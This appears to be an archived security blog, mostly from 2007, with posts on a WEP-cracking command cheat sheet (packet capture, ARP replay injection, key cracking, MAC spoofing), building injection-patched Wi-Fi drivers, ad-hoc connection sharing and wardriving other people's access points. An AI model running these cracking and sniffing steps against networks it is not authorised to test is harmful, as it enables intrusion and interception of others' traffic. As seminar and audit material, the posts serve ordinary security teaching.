
Wednesday, July 09, 2008

WEP cracking formula

Here is one of the souvenirs from Medan (last Sunday night :)). I really can no longer memorize long formulas, and I don't feel I need to either. So, to make the WEP cracking demo easier to do at every seminar (actually I only thought of making it while in Medan), I made this formula, and hopefully it's useful for everyone :)

Thanks to STMIK Potensi Utama for all the opportunities and the fun given to me and Dedi; special thanks to Pak Bob, Abdi, Yudi, Bang Asbon and Bang Bujang for everything while we were there, and to the participants of the Linux security workshop (Dedi's material: Windows 2003 server security) and the wifi security seminar (Dedi's material: web hacking kungfu), who looked more "enthusiastic" than the presenters. Keep up the success :)

All right, here is the formula (a summary from www.aircrack-ng.org)

WEP Cracking Formula

Need info:
Access Point
eSSID= (A)
bssid/mac address= (B)
channel= (C)
security= (D)

Attacker interface
madwifi iface= (X)
mac address= (Y)
iface = (Z)

FARMING the KEY
airmon-ng stop (X)
airmon-ng (Z) start (C)
airodump-ng --bssid (B) -c (C) -w namafile (X)
aireplay-ng -1 6000 -o 1 -q 10 -e (A) -a (B) -h (Y) (X)
aireplay-ng --arpreplay -b (B) -h (Y) -x 600 (X)

CRACKING the KEY
aircrack-ng -z -b (B) namafile-*.cap (WEP/ptw style)
aircrack-ng -w -b (B) namafile-*.cap (WPA/dictionary style)

CHANGE MAC
#ifconfig (X) hw ether (NEW MAC)

Enjoy(tm)
Images are taken from http://lisa.jpl.nasa.gov

Tuesday, February 12, 2008

Gentoo madwifi ad-hoc

I needed to figure this out when the AP was gone (lol); actually I just borrowed it, and the time limit is up. So, to connect my iPod touch (ex1a) to the internet there is only one way (on an iPhone you can use GPRS): a Wifi ad-hoc connection shared with my laptop. Hmm.. let's see (simple ICS)

iPod Touch (wifi) -----> (ath0:madwifi)laptop(eth0) ----->inet

It's a pain when you try iwconfig [dev] mode Ad-Hoc and it doesn't work at all. Madwifi supports wlanconfig, so create a VAP for it. Short instructions below:

~ # wlanconfig ath0 destroy
~ # wlanconfig ath0 create wlandev wifi0 wlanmode adhoc
~ # iwconfig ath0 essid venom channel 2
(here you can set an encryption key for WEP, or use WPA)
~ # ifconfig ath0 192.168.0.52 netmask 255.255.255.0
~ # echo "1" > /proc/sys/net/ipv4/ip_forward

Open your iPod touch wifi configuration, set the ESSID to venom, and give it a static IP (set the laptop's ath0 address as the gateway, and don't forget to set the DNS as well).

If you need to combine it with DHCP (for your wifi client),

iPod Touch (wifi:dhcp-client) -----> (ath0:madwifi:dhcp-server)laptop(eth0) ----->inet

just install the dnsmasq package, so..
~# emerge dnsmasq
~# vi /etc/dnsmasq.conf
Add this line to enable dhcp:
dhcp-range=192.168.0.50,192.168.0.150,12h
Restrict dnsmasq to just the LAN interface
interface=ath0
~# rc-update add dnsmasq default
~# /etc/init.d/dnsmasq start

It's not only for Gentoo, but for general usage of madwifi.
Hope it helps (nothing special), have phun!
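The complete connection-sharing setup from this post as one reviewable script, as an added example that is not part of the original post: it wraps the wlanconfig/ifconfig sequence, writes the dnsmasq settings, and adds the NAT rules that the ip_forward line alone does not give you. Interface names (ath0, eth0), the ESSID venom and the 192.168.0.0/24 addressing are assumed from the post; DRY_RUN=1 (the default) only prints the commands.

```shell
#!/bin/sh
# Added example, not from the original post: ad-hoc Internet connection
# sharing for a madwifi VAP, with the NAT rules that ip_forward alone
# does not provide. Assumed: ath0 wifi side, eth0 upstream, 192.168.0.0/24.

WLAN=${WLAN:-ath0}
WAN=${WAN:-eth0}
LAN_ADDR=${LAN_ADDR:-192.168.0.52}
LAN_MASK=${LAN_MASK:-255.255.255.0}
DRY_RUN=${DRY_RUN:-1}

# Print the command in dry-run mode, execute it otherwise.
run() {
    if [ "$DRY_RUN" = "1" ]; then
        printf '%s\n' "$*"
    else
        "$@"
    fi
}

# /etc/dnsmasq.conf content: DHCP on the wifi side only, and bind only
# there so the DNS/DHCP service is not also listening on the upstream link.
dnsmasq_conf() {
    cat <<EOF
interface=$WLAN
bind-interfaces
dhcp-range=192.168.0.50,192.168.0.150,12h
dhcp-option=option:router,$LAN_ADDR
dhcp-option=option:dns-server,$LAN_ADDR
EOF
}

# Recreate the VAP in ad-hoc mode (the post's wlanconfig sequence).
setup_vap() {
    run wlanconfig "$WLAN" destroy
    run wlanconfig "$WLAN" create wlandev wifi0 wlanmode adhoc
    run iwconfig "$WLAN" essid venom channel 2
    run ifconfig "$WLAN" "$LAN_ADDR" netmask "$LAN_MASK"
}

# Forwarding plus NAT: without MASQUERADE the upstream has no route back to
# 192.168.0.0/24, so clients get no replies. Only established traffic returns.
setup_nat() {
    run sysctl -w net.ipv4.ip_forward=1
    run iptables -t nat -A POSTROUTING -o "$WAN" -j MASQUERADE
    run iptables -A FORWARD -i "$WLAN" -o "$WAN" -j ACCEPT
    run iptables -A FORWARD -i "$WAN" -o "$WLAN" -m state --state ESTABLISHED,RELATED -j ACCEPT
    run iptables -P FORWARD DROP
}
```

Run setup_vap and setup_nat with DRY_RUN=0 as root to apply, and write dnsmasq_conf to /etc/dnsmasq.conf before starting dnsmasq as in the post.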


Thursday, April 19, 2007

Installing madwifi-ng (plus aircrack-ng patch)

Before you play with aircrack-ng you have to patch your driver for injection (in this case madwifi for my Atheros card; you can check for a patch for your driver here).
y3dips@tarantula:~$ svn checkout http://svn.madwifi.org/trunk/ madwifi-ng
y3dips@tarantula:~$ wget http://patches.aircrack-ng.org/madwifi-ng-r2277.patch
y3dips@tarantula:~$ cd madwifi-ng/
y3dips@tarantula:~/madwifi-ng$ patch -Np1 -i ../madwifi-ng-r2277.patch
patching file ath/if_ath.c
y3dips@tarantula:~/madwifi-ng$ sudo make
Checking requirements... ok.
Checking kernel configuration... ok.
...{process truncated}
y3dips@tarantula:~/madwifi-ng$ sudo make install
sh scripts/find-madwifi-modules.sh 2.6.17-10-generic

WARNING:
It seems that there are modules left from previous MadWifi installations.
If you are unistalling the MadWifi modules please press "r" to remove them.
If you are installing new MadWifi modules, you should consider removing those
already installed, or else you may experience problems during operation.
Remove old modules?

[l]ist, [r]emove, [i]gnore or e[x]it (l,r,i,[x]) ?
r
... {process truncated}
y3dips@tarantula:~/madwifi-ng$ sudo depmod -ae
y3dips@tarantula:~/madwifi-ng$ sudo modprobe ath_pci
y3dips@tarantula:~/madwifi-ng$ iwconfig ath0
ath0 IEEE 802.11b ESSID:""
Mode:Managed Channel:0 Access Point: Not-Associated
Bit Rate:0 kb/s Tx-Power:0 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Then you can start your wifi hacking
y3dips@tarantula:~$ sudo airmon-ng stop ath0

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)

y3dips@tarantula:~$
Happy hacking :)


Monday, April 16, 2007

Installing Aircrack-ng

An easy way to install aircrack-ng (aircrack is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, thus making the attack much faster compared to other WEP cracking tools. In fact, aircrack is a set of tools for auditing wireless networks.) and get the newest version.

y3dips@tarantula:~$ svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
A aircrack-ng/airoscript
A aircrack-ng/airoscript/LICENSE
A aircrack-ng/airoscript/AUTHORS
A aircrack-ng/airoscript/CHANGELOG
A aircrack-ng/airoscript/airoscript.sh
A aircrack-ng/airoscript/README
A aircrack-ng/test
A aircrack-ng/test/makeivs.c
A aircrack-ng/test/password.lst
A aircrack-ng/test/wep.shared.key.authentication.cap
A aircrack-ng/test/wpa.cap
A aircrack-ng/test/wpa2.eapol.cap
A aircrack-ng/test/wep.open.system.authentication.cap
A aircrack-ng/LICENSE
A aircrack-ng/VERSION
A aircrack-ng/Makefile.osx
A aircrack-ng/AUTHORS
A aircrack-ng/airmon-ng
A aircrack-ng/ChangeLog
A aircrack-ng/patches
A aircrack-ng/patches/zd1211rw_inject_2.6.17.patch
A aircrack-ng/patches/madwifi-ng-r2277.patch
A aircrack-ng/patches/linux-wlan-0.2.5.packet.injection.patch
A aircrack-ng/patches/hostap-kernel-2.6.18.patch
A aircrack-ng/patches/rtl8187_2.6.20v2.patch
A aircrack-ng/patches/madwifi-old-r1417.patch
A aircrack-ng/patches/prism54-svn-20050724.patch
A aircrack-ng/patches/rtl8180-0.21v2.patch
A aircrack-ng/patches/hostap-driver-0.4.7.patch
A aircrack-ng/patches/ipw2200-1.1.4-inject.patch
A aircrack-ng/patches/zd1211rw_inject_2.6.20.patch
A aircrack-ng/patches/ieee80211_inject.patch
A aircrack-ng/patches/old
A aircrack-ng/patches/old/zd1211rw_malformed.patch
A aircrack-ng/patches/old/rtl8187_1010.0622.patch
A aircrack-ng/patches/old/madwifi-ng-r1475_disable_retry_raw.patch
A aircrack-ng/patches/old/linux-wlan-0.2.3.packet.injection.patch
A aircrack-ng/patches/old/rt2500-cvs-20051008-prismheader.patch
A aircrack-ng/patches/old/rt2500-cvs-2005112305.patch
A aircrack-ng/patches/old/rt2500-cvs-20050724.patch
A aircrack-ng/patches/old/madwifi-ng-r1520.patch
A aircrack-ng/patches/old/hostap-driver-0.4.5.patch
A aircrack-ng/patches/old/rt2570-cvs-20051008-prismheader.patch
A aircrack-ng/patches/old/rtl8187_1010.0622v2.patch
A aircrack-ng/patches/old/hostap-driver-0.3.9.patch
A aircrack-ng/patches/old/madwifi-ng-r1730.patch
A aircrack-ng/patches/old/rt2570-cvs-2005112305.patch
A aircrack-ng/patches/old/madwifi-ng-r1713.patch
A aircrack-ng/patches/old/rt2570-cvs-20050824.patch
A aircrack-ng/patches/old/rtl8187_2.6.20.patch
A aircrack-ng/patches/old/madwifi-ng-r1526.patch
A aircrack-ng/patches/old/madwifi-ng-r1545.patch
A aircrack-ng/patches/old/rtl8180-0.21.patch
A aircrack-ng/patches/old/madwifi-ng-r1486.patch
A aircrack-ng/patches/old/hostap-kernel-2.6.16.patch
A aircrack-ng/patches/old/madwifi-cvs-20051025.patch
A aircrack-ng/patches/old/madwifi-ng-r1983.patch
A aircrack-ng/patches/old/madwifi-ng-r1679.patch
A aircrack-ng/patches/old/madwifi-ng-r1886.patch
A aircrack-ng/patches/old/madwifi-cvs-20050814.patch
A aircrack-ng/patches/old/madwifi-cvs-20050707.patch
A aircrack-ng/patches/old/ipw2200-1.1.3-inject.patch
A aircrack-ng/patches/old/wlanng-0.2.1-pre26.patch
A aircrack-ng/patches/old/madwifi-ng-r1457-1473_disable_retry_raw.patch
A aircrack-ng/src
A aircrack-ng/src/airtun-ng.c
A aircrack-ng/src/uniqueiv.c
A aircrack-ng/src/crc.c
A aircrack-ng/src/aireplay-ng.c
A aircrack-ng/src/kstats.c
A aircrack-ng/src/airdecap-ng.c
A aircrack-ng/src/sha1-mmx.S
A aircrack-ng/src/crypto.c
A aircrack-ng/src/aircrack-ng.c
A aircrack-ng/src/ivstools.c
A aircrack-ng/src/airodump-ng.c
A aircrack-ng/src/crctable.h
A aircrack-ng/src/crypto.h
A aircrack-ng/src/pcap.h
A aircrack-ng/src/common.c
A aircrack-ng/src/version.h
A aircrack-ng/src/packetforge-ng.c
A aircrack-ng/manpages
A aircrack-ng/manpages/aircrack-ng.1
A aircrack-ng/manpages/airodump-ng.1
A aircrack-ng/manpages/ivstools.1
A aircrack-ng/manpages/airtun-ng.1
A aircrack-ng/manpages/airmon-ng.1
A aircrack-ng/manpages/aireplay-ng.1
A aircrack-ng/manpages/kstats.1
A aircrack-ng/manpages/airdecap-ng.1
A aircrack-ng/manpages/packetforge-ng.1
A aircrack-ng/manpages/makeivs.1
A aircrack-ng/Makefile.NetBSD
A aircrack-ng/README
A aircrack-ng/Makefile.other
A aircrack-ng/evalrev
A aircrack-ng/INSTALLING
A aircrack-ng/Makefile.OpenBSD
A aircrack-ng/Makefile.cygwin
A aircrack-ng/Makefile
A aircrack-ng/packages
A aircrack-ng/packages/PKGBUILD
A aircrack-ng/packages/slack-desc
A aircrack-ng/packages/aircrack-ng.spec
Checked out revision 297.

y3dips@tarantula:~/aircrack-ng$ make
gcc -g -W -Wall -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=`./evalrev` src/aircrack-ng.c src/crypto.c src/sha1-mmx.S src/common.c -o aircrack-ng -lpthread
gcc -g -W -Wall -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=`./evalrev` src/airdecap-ng.c src/crypto.c src/common.c src/crc.c -o airdecap-ng
gcc -g -W -Wall -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=`./evalrev` src/packetforge-ng.c src/common.c src/crc.c -o packetforge-ng
gcc -g -W -Wall -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=`./evalrev` src/ivstools.c src/common.c -o ivstools
gcc -g -W -Wall -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=`./evalrev` src/kstats.c -o kstats
gcc -g -W -Wall -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=`./evalrev` test/makeivs.c -o makeivs
gcc -g -W -Wall -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=`./evalrev` src/aireplay-ng.c src/common.c src/crc.c -o aireplay-ng
gcc -g -W -Wall -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=`./evalrev` src/airodump-ng.c src/common.c -o airodump-ng
gcc -g -W -Wall -O3 -D_FILE_OFFSET_BITS=64 -D_REVISION=`./evalrev` src/airtun-ng.c src/common.c src/crc.c src/crypto.c -o airtun-ng

y3dips@tarantula:~/aircrack-ng$ sudo make install
Password:
install -d /usr/local/bin
install -m 755 aircrack-ng airdecap-ng packetforge-ng ivstools kstats /usr/local/bin
install -m 755 makeivs /usr/local/bin
install -d /usr/local/man/man1
install -m 644 ./manpages/* /usr/local/man/man1
install -d /usr/local/sbin
install -m 755 aireplay-ng airodump-ng airtun-ng /usr/local/sbin
install -m 755 airmon-ng /usr/local/sbin

y3dips@tarantula:~/aircrack-ng$ aircrack-ng

Aircrack-ng 0.7 r297 - (C) 2006,2007 Thomas d'Otreppe
Original work: Christophe Devine
http://www.aircrack-ng.org

usage: aircrack-ng [options] <.cap / .ivs file(s)>

Common options:

-a : force attack mode (1/WEP, 2/WPA-PSK)
-e : target selection: network identifier
-b : target selection: access point's MAC
-q : enable quiet mode (no status output)

Static WEP cracking options:

-c : search alpha-numeric characters only
-t : search binary coded decimal chr only
-h : search the numeric key for Fritz!BOX
-d : debug - specify mask of the key (A1:XX:CF:YY)
-m : MAC address to filter usable packets
-n : WEP key length : 64/128/152/256/512
-i : WEP key index (1 to 4), default: any
-f : bruteforce fudge factor, default: 2
-k : disable one attack method (1 to 17)
-x or -x0 : disable last keybytes bruteforce
-x1 : enable last keybyte bruteforcing (default)
-x2 : enable last two keybytes bruteforcing
-y : experimental single bruteforce mode
-s : show ASCII version of the key

WEP and WPA-PSK cracking options:

-w : path to a dictionary file (multiple
dictionnaries can be specified.
See manpage for more information)

--help : Displays this usage screen

No file to crack specified.

Happy "wifi hacking" then ..

Wednesday, March 14, 2007

Airport 100307

-The explanation of the picture will follow As Soon As Possible :), my pentest within a short time (15.47 - 16.32 WIB) at an Airport ... (educational purposes only) -

I'm so sorry, for some reason I have to close this article ..
mwuach .. see you guyz

Wednesday, February 07, 2007

Lurking around; Unmotivated

As it's written in the title, there is no motivation for me to do "war driving" this time (since I'm doing it huddled up, I think it's fair enough to call it "war huddle-up" :lol:), except for doing an Access Point (AP) survey, checking the security levels, and also learning the distance from my place to the APs, and truly I found many interesting things in this activity. I also had to use "wireshark" (the new version of ethereal) for "unmotivy" reasons.. (like I've been intimidated with guns :P)

During the "war huddle-up" time, I found that some APs are hiding their SSIDs, which means they are aware of security. One AP is using "WEP" for encryption (sorry, I didn't crack the key, for a reason; actually I'm afraid of going too far :P). At last, enjoy the screenshots



netstumbler specifically lets us know the signal strength (or we may call it the distance)



kismet puts the device into monitor mode (which makes your work easier if you don't know how to set iwconfig [dev] mode monitor :P, so you can combine it with sniffing tools)


then, just harvest the traffic.

FIN